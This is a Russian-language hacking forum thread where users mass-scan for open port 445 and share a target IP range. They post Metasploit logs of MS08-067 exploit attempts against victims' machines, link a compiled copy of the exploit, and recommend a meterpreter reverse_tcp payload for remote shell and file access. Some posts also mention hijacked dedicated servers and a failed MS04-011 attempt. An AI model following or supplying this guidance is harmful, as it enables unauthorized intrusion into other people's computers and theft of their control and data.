Вот вам хороший совет: запускайте скан под WIN 2000. Я запустил в сто потоков- тормозов вроде нет, а процесс как-то веселей пошел. Интересно, в чем будет заключаться "палево" ачата? Я же не говорил, что мне кто-то должен подарить дедик (в какой-то теме ты выкладывал IP деда, логин и пасс- это конечно же, не палевно). Просто тут у многих возникала подобная проблема: просканил много сетей, а толку- 0. Хотя это уже не актуально- я вроде нашел компы с открытым 445. Но в любом случае спасибо за статью.
Ну вот, теперь стали чаще попадаться диапозоны с открытым 445. Кстати Я всеже напишу, вдруг кому поможет: восемьдесят семь.двинадцать.двадцать один.пятьдесят - восемьдесят семь.двинадцать.двадцать один.семьдесятРебят, вы уж простите за навязчивость! Но у меня такая проблема: Ставлю я метасплойт, пытаюсь его запустить (файлик /bin/rubyw.exe) и тупо ничего не происходит. При установке вроде ошибок не возникает. После нее открывается черное окошко с бегущими строчками (я тут прочел, что так и должно быть), а потом оно просто закрывается и все.
Вообщем, тема такая: нашел мясо, запустил тулзу, а потом появилось вот что: Code: 23:06:41 - ms08_067_netapi [*] Triggering the vulnerability... 23:07:54 - ms08_067_netapi [*] Launching exploit windows/smb/ms08_067_netapi... 23:07:56 - ms08_067_netapi [*] Started reverse handler 23:07:58 - ms08_067_netapi [*] Automatically detecting the target... 23:08:01 - ms08_067_netapi [*] Fingerprint: Unix Samba 3.0.25b-apple - lang:Unknown 23:08:01 - ms08_067_netapi [*] Could not determine the exact language pack Система - явный Виндоз! Вопрос 1 - почему по фингерпринту детектится как Юниксоид? Вопрос 2 - что означает "Could not determine the exact language pack"? Смысл фразы я понимаю ))) но шозанах ваще?
Тема 2: Сцапал еще одного поцика, снова действия как и прежде.. Code: 23:18:47 - ms08_067_netapi [*] Launching exploit windows/smb/ms08_067_netapi... 23:18:48 - ms08_067_netapi [*] Started reverse handler 23:18:51 - ms08_067_netapi [*] Automatically detecting the target... 23:19:03 - ms08_067_netapi [*] Fingerprint: Windows XP Service Pack 2 - lang:Japanese 23:19:03 - ms08_067_netapi [*] Selected Target: Windows XP SP2 Japanese (NX) 23:19:04 - ms08_067_netapi [*] Triggering the vulnerability... и тишина........
Для неосиливших метасплойт нашлась версия данного сплойта на C++ http://milw0rm.com/sploits/2008-MS08-067.rar Есть даже скомпилированный экзешник
Кстати, на 445 порту крутится и другой вулнерабили ) MS04-011, именно его я тоже запускал, но меня откинули нах, сказали, что нет доступа )
А вот у меня какая проблема. Прервал установку метасплоита, и теперь не запускается вообще никак. Прервал на этапе бегущих строк в командной. Есть предложения?
Есть альтернативный вариант: выбрать начинку windows/meterpreter/reverse_tcp одноввеменно имеем возможность напрямую обмениваться файлами (rightclick -> browse) и командную строку. [исключаем пункт с фтп и заливкой файлов ч/з радмин]